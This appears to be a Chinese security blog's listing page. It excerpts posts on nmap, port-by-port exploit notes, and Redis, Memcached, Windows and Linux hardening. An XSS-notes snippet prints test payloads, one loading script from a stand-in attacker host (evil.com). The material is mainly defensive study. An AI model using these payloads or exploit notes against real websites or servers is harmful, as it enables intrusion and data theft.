nmap用法

摘要: Nmap 7.70SVN ( https://nmap.org ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, 阅读全文
posted @ 2018-03-27 14:31 木讷 阅读(239) 评论(0) 推荐(0) 编辑

常见端口威胁

摘要: 端口软件/服务名称可能存在的漏洞/利用方式 6379 Redis 1)未授权访问 2) 主从复制RCE 8161 Apache Group ActiveMQ 1)远程代码执行(CVE-2016-3088) 2)反序列化 (CVE-2015-5254) 873 Rsync 1)未授权访问 9001 S 阅读全文
posted @ 2018-03-19 19:57 木讷 阅读(1669) 评论(0) 推荐(0) 编辑

网络流量分析

摘要: 混杂模式: 混杂模式(Promiscuous Mode)是指一台机器能够接收所有经过它的数据流,而不论其目的地址是否是他。是相对于通常模式(又称“非混杂模式”)而言的。对于广播式集线器(Hub)来说,假如PC1、PC2、PC3接在同一个Hub上,当PC1给PC3发送包时,Hub将广播这个包,所以PC 阅读全文
posted @ 2018-01-04 10:32 木讷 阅读(287) 评论(0) 推荐(0) 编辑

memcached加固

摘要: Memcached服务安全加固 更新时间:2017-06-30 10:07:49 Memcached服务安全加固 更新时间:2017-06-30 10:07:49 漏洞描述 Memcached是一套常用的key-value缓存系统,由于它本身没有权限控制模块,所以对公网开放的Memcache服务很容 阅读全文
posted @ 2017-12-05 10:57 木讷 阅读(130) 评论(0) 推荐(0) 编辑

redis加固

摘要: 一.背景描述 1.漏洞描述 Redis 因配置不当存在未授权访问漏洞,可以被攻击者恶意利用。 在特定条件下,如果 Redis 以 root 身份运行,黑客可以给 root 账号写入 SSH 公钥文件,直接通过 SSH 登录受害服务器,从而获取服务器权限和数据。一旦入侵成功,攻击者可直接添加账号用于 阅读全文
posted @ 2017-12-05 10:07 木讷 阅读(801) 评论(0) 推荐(0) 编辑

windows加固

摘要: 1. 账户管理和认证授权 1.1 账户 默认账户安全 禁用Guest账户。 禁用或删除其他无用账户(建议先禁用账户三个月,待确认没有问题后删除。) 操作步骤 打开 控制面板 > 管理工具 > 计算机管理,在 系统工具 > 本地用户和组 > 用户 中,双击 Guest 帐户,在属性中选中 帐户已禁用, 阅读全文
posted @ 2017-12-05 09:44 木讷 阅读(1411) 评论(0) 推荐(0) 编辑

linux加固

摘要: 1. 账号和口令 1.1 禁用或删除无用账号 减少系统无用账号,降低安全风险。 操作步骤 使用命令 userdel <用户名> 删除不必要的账号。 使用命令 passwd -l <用户名> 锁定不必要的账号。 使用命令 passwd -u <用户名> 解锁必要的账号。 1.2 检查特殊账号 检查是否 阅读全文
posted @ 2017-12-05 09:39 木讷 阅读(416) 评论(0) 推荐(0) 编辑

加密与编码

摘要: Base64编码说明 Base64编码要求把3个8位字节(3*8=24)转化为4个6位的字节(4*6=24),之后在6位的前面补两个0,形成8位一个字节的形式。 如果剩下的字符不足3个字节,则用0填充,输出字符使用'=',因此编码后输出的文本末尾可能会出现1或2个'='。 为了保证所输出的编码位可读 阅读全文
posted @ 2017-11-29 11:30 木讷 阅读(146) 评论(0) 推荐(0) 编辑

XSS笔记

摘要: XSS测试代码: <img src="javascript:alert(/xss/)"> <script src=http://evil.com/xss.js></script> </textarea><script>alert(/xss/)</script> "><script>alert(/xs 阅读全文
posted @ 2017-11-27 16:24 木讷 阅读(231) 评论(0) 推荐(0) 编辑

hackbar功能简介

摘要: SQL:提供三种数据库的sql查询语句,以及一些方便联合查询的语句 XSS:提供xss攻击语句 string.fromcharcode():将根据UNICODE 值来输出xss语句 html charactor : 将XSS语句转化为HTML字符实体(以&开头) alert(xss) stateme 阅读全文
posted @ 2017-10-14 10:33 木讷 阅读(773) 评论(0) 推荐(0) 编辑